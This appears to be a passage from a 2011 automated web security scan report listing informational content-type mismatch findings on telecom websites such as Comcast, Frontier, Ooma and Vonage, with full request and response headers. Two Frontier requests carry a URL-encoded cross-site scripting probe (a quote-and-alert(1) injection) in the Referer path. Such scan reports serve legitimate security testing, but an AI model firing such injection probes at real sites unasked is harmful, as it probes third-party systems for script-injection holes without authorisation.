Cookie: SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}; mbox=session#1315327839174-766376#1315331594|check#true#1315329794|PC#1315327839174-766376.19#1316539335; s_pers=%20s_dfa%3Dcomcastdotcomprod%7C1315331533264%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%255D%7C1473182534676%3B%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20gpv_07%3Dsearch%2520results%2520-%2520page%25201%7C1315331534692%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20s_cc%3Dtrue%3B%20ev41%3Dxss%3B%20stc18%3Dxss%3B%20SC_LINKS%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B; bn_u=6923713561343025788

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:22:16 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 19 Sep 2008 12:18:22 GMT
ETag: "2a294c1-2796-b28cbf80"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 10134
Connection: close
Content-Type: text/plain; charset=UTF-8

..............(...f... ......................h...v... ...........    ........ .h....... .... .........(....... ...................................HKI.........#...WQ............z.....qk..........62....
...[SNIP]...

25.45. http://verify.authorize.net/anetseal/images/secure90x72.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://verify.authorize.net
Path:   /anetseal/images/secure90x72.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /anetseal/images/secure90x72.gif HTTP/1.1
Host: verify.authorize.net
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/misc/privacy-policy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 2894
Content-Type: image/gif
Last-Modified: Fri, 26 Mar 2010 17:33:22 GMT
Accept-Ranges: bytes
ETag: "0dd746eacdca1:1241"
Server: Microsoft-IIS/6.0
P3P: CP="NOI NID NAV"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:26:25 GMT

.PNG
.
...IHDR...Z...H.....v.......tEXtSoftware.Adobe ImageReadyq.e<..
.IDATx...?.+G...G.G...pK...ED.S..#DG..P..FQ:#.D.8....'BH....H.n...".E.....    ..?.....w..]..{o.H#..g..3.<...;s...{O...S...zh...|g.
...[SNIP]...

25.46. http://www.aptela.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.aptela.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; __utma=207344579.967367889.1315327921.1315327921.1315327921.1; __utmb=207344579.1.10.1315327921; __utmc=207344579; __utmz=207344579.1315327921.1.1.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; WRUID=1480628145.1067928662

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:04 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 31 Dec 2008 16:47:09 GMT
ETag: "1c6c002-37e-7572dd40"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

[binary body: non-text data served from favicon.ico, not recognised by the scanner]
...[SNIP]...

25.47. http://www.comcast.com/MediaLibrary/1/1/Common/Images/borders/230_Middle.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.comcast.com
Path:   /MediaLibrary/1/1/Common/Images/borders/230_Middle.gif

Issue detail

The response contains a Content-type statement declaring a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /MediaLibrary/1/1/Common/Images/borders/230_Middle.gif HTTP/1.1
Host: www.comcast.com
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Corporate/Customers/contactus/ContactUs.html?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331665408%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329866001'%255D%255D%7C1473182666001%3B%20gpv_07%3Dsearch%2520results%2520-%2520page%25201%7C1315331666014%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; bn_u=6923713561343025788; fsr.a=1315329867492; mbox=session#1315327839174-766376#1315331728|PC#1315327839174-766376.19#1316539468|check#true#1315329928

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Mon, 28 Jun 2010 22:27:05 GMT
Accept-Ranges: bytes
ETag: "2aab9791117cb1:0"
Server: Microsoft-IIS/7.5
Date: Tue, 06 Sep 2011 12:24:27 GMT
Connection: close
Content-Length: 354

[binary body: JFIF/JPEG header with "Ducky" and "Adobe" application segments]
...[SNIP]...

25.48. http://www.comcast.com/MediaLibrary/1/1/Common/Images/borders/230_bottom.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.comcast.com
Path:   /MediaLibrary/1/1/Common/Images/borders/230_bottom.gif

Issue detail

The response contains a Content-type statement declaring a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /MediaLibrary/1/1/Common/Images/borders/230_bottom.gif HTTP/1.1
Host: www.comcast.com
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Corporate/shop/retail/StoreLocator.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329864239'%255D%255D%7C1473182664238%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331664694%3B%20gpv_07%3Dcustomers%2520-%2520move%2520-%2520home%7C1315331664856%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; fsr.a=1315329865299; mbox=session#1315327839174-766376#1315331726|PC#1315327839174-766376.19#1316539466|check#true#1315329926

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Mon, 28 Jun 2010 22:27:09 GMT
Accept-Ranges: bytes
ETag: "cadbd3b1117cb1:0"
Server: Microsoft-IIS/7.5
Date: Tue, 06 Sep 2011 12:24:25 GMT
Connection: close
Content-Length: 657

[binary body: JFIF/JPEG header with "Ducky" and "Adobe" application segments]
...[SNIP]...

25.49. http://www.comcast.com/MediaLibrary/1/1/Common/Images/borders/230_top.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.comcast.com
Path:   /MediaLibrary/1/1/Common/Images/borders/230_top.gif

Issue detail

The response contains a Content-type statement declaring a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /MediaLibrary/1/1/Common/Images/borders/230_top.gif HTTP/1.1
Host: www.comcast.com
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Corporate/shop/retail/StoreLocator.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329864239'%255D%255D%7C1473182664238%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331664694%3B%20gpv_07%3Dcustomers%2520-%2520move%2520-%2520home%7C1315331664856%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; fsr.a=1315329865299; mbox=session#1315327839174-766376#1315331726|PC#1315327839174-766376.19#1316539466|check#true#1315329926

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Mon, 28 Jun 2010 22:27:10 GMT
Accept-Ranges: bytes
ETag: "f4e6ac1117cb1:0"
Server: Microsoft-IIS/7.5
Date: Tue, 06 Sep 2011 12:24:25 GMT
Connection: close
Content-Length: 681

[binary body: JFIF/JPEG header with "Ducky" and "Adobe" application segments]
...[SNIP]...

25.50. https://www.comcast.com/Localization/QueryCompletion.cajax

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.comcast.com
Path:   /Localization/QueryCompletion.cajax

Issue detail

The response contains a Content-type statement declaring HTML. However, it actually appears to contain plain text.

Request

POST /Localization/QueryCompletion.cajax HTTP/1.1
Host: www.comcast.com
Connection: keep-alive
Referer: https://www.comcast.com/Localization/Localize.cspx?Referer=%2fshop%2fbuyflow%2fdefault.ashx%3farea%3d6%26SourcePage%3dVOIP
Content-Length: 39
Origin: https://www.comcast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; mbox=session#1315327839174-766376#1315330223|check#true#1315328423; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%255D%7C1473180639972%3B%20s_dfa%3Dcomcastdotcomprod%7C1315330160518%3B%20gpv_07%3Dlocalization%2520-%2520shop%7C1315330162478%3B; s_sess=%20c%3Dtelephone%252BserviceKNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136www.google.com%3B%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20cf%3D0%3B%20s_sq%3D%3B; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}

{"Method":"GetKeywords","Arg":"\"xs\""}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Date: Tue, 06 Sep 2011 12:22:11 GMT
Connection: close

"{\"_keyword\":\"xs\",\"_result\":[]}"

25.51. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The response contains a Content-type statement declaring CSS. However, it actually appears to contain HTML.

Request

GET /AgentOrdering/CustomAppTabInfo/tabs.css HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Length: 542
Content-Type: text/css
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:31:23 GMT

<STYLE TYPE="text/css">
   h1,p{
       margin:0px !important;
   }
   .tableft{
       background-image:url(../Images/tableft.gif);
   }
   .tabright{
       background-image:url(../Images/tabright.gif);
   }
   #tabm
...[SNIP]...

25.52. http://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.frontier.com
Path:   /Controls/SharedWebMethods.aspx/GetCurrentLocale

Issue detail

The response contains a Content-type statement declaring JSON. However, it actually appears to contain plain text.

Request

POST /Controls/SharedWebMethods.aspx/GetCurrentLocale HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Content-Length: 12
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*
Pragma: no-cache
Cache-Control: no-cache

{'href': ''}

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Content-Length: 2

""

25.53. https://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The response contains a Content-type statement declaring CSS. However, it actually appears to contain HTML.

Request

GET /AgentOrdering/CustomAppTabInfo/tabs.css HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Length: 542
Content-Type: text/css
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:27:19 GMT

<STYLE TYPE="text/css">
   h1,p{
       margin:0px !important;
   }
   .tableft{
       background-image:url(../Images/tableft.gif);
   }
   .tabright{
       background-image:url(../Images/tabright.gif);
   }
   #tabm
...[SNIP]...

25.54. https://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.frontier.com
Path:   /Controls/SharedWebMethods.aspx/GetCurrentLocale

Issue detail

The response contains a Content-type statement declaring JSON. However, it actually appears to contain plain text.

Request

POST /Controls/SharedWebMethods.aspx/GetCurrentLocale HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
Content-Length: 12
Origin: https://www.frontier.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/json; charset=UTF-8
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

{'href': ''}

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Content-Length: 2

""

25.55. http://www.ooma.com/poormanscron/run-cron-check

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ooma.com
Path:   /poormanscron/run-cron-check

Issue detail

The response contains a Content-type statement declaring script. However, it actually appears to contain plain text.

Request

GET /poormanscron/run-cron-check HTTP/1.1
Host: www.ooma.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS7755cd8bc8424ab1d27f14d04d5a5a56=npu0136i2olrdchgh3cn570or2; has_js=1; __utmx=238888606.; __utmxx=238888606.; __utmx_k_247871838=1; __utma=257238996.1845384337.1315327926.1315327926.1315327926.1; __utmb=257238996.1.10.1315327926; __utmc=257238996; __utmz=257238996.1315327926.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; _chartbeat2=qemhbgfmeo01qhct.1315327925630

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Expires: Tue, 06 Sep 2011 12:24:53 +0000
Last-Modified: Tue, 06 Sep 2011 11:52:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 21
Connection: close
Content-Type: text/javascript; charset=utf-8

{ "cron_run": false }

25.56. http://www.ooma.com/sites/all/themes/ooma/img/home_savings_bar.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ooma.com
Path:   /sites/all/themes/ooma/img/home_savings_bar.png

Issue detail

The response contains a Content-type statement declaring a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /sites/all/themes/ooma/img/home_savings_bar.png HTTP/1.1
Host: www.ooma.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS7755cd8bc8424ab1d27f14d04d5a5a56=npu0136i2olrdchgh3cn570or2; has_js=1; __utmx=238888606.; __utmxx=238888606.; __utmx_k_247871838=1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:05 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 20 May 2011 18:17:58 GMT
ETag: "174016-22f1-4a3b9242c4180"
Accept-Ranges: bytes
Content-Length: 8945
Cache-Control: max-age=1209600
Expires: Tue, 20 Sep 2011 11:52:05 GMT
Connection: close
Content-Type: image/png

[binary body: JFIF/JPEG header with "Ducky" and "Adobe" application segments]
...[SNIP]...

25.57. http://www.vonage.com/googlesearch/get_results.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.vonage.com
Path:   /googlesearch/get_results.php

Issue detail

The response contains a Content-type statement declaring HTML. However, it actually appears to contain XML.

Request

POST /googlesearch/get_results.php?mode=cluster&coutput=xml&client=external_test&q=xss&lang_cntry=en_us&refer=/ HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us
Content-Length: 0
Origin: http://www.vonage.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_cm=telephone%20serviceGooglewww.google.com; op471customerhomepagegum=a04v0e90o72796q0724o91744; op471customerhomepageliid=a04v0e90o72796q0724o91744; MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_nr=1315328340141-New; gpv_pageName=index_login; s_sq=%5B%5BB%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.3.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Content-Length: 65
Content-Type: text/html

<?xml version="1.0"?>
<toplevel>
<t_fetch int="19"/>
</toplevel>

25.58. http://www.websitealive9.com/2140/Visitor/vTracker_v2.asp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.websitealive9.com
Path:   /2140/Visitor/vTracker_v2.asp

Issue detail

The response contains a Content-type statement declaring HTML. However, it actually appears to contain script.

Request

GET /2140/Visitor/vTracker_v2.asp?websiteid=344&groupid=2140 HTTP/1.1
Host: www.websitealive9.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: no-store, must-revalidate, private
Pragma: no-cache
P3P: CP="NOI DSP COR CURa OUR NOR"
Content-Length: 8029
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Cache-control: private


var embed_departmentid = '0';


// keep on page
function URLEncode(plaintext)
{
   // The Javascript escape and unescape functions do not correspond
   // with what browsers actually do...
   va
...[SNIP]...

25.59. http://www.whitefence.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /favicon.ico

Issue detail

The response contains a Content-type statement declaring plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:10 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 11:52:10 GMT
Last-Modified: Tue, 08 Jul 2008 14:18:00 GMT
ETag: "199a44-47e-48737718"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

[binary body: non-text data served from favicon.ico, not recognised by the scanner]
...[SNIP]...

26. Content type is not specified
There are 2 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
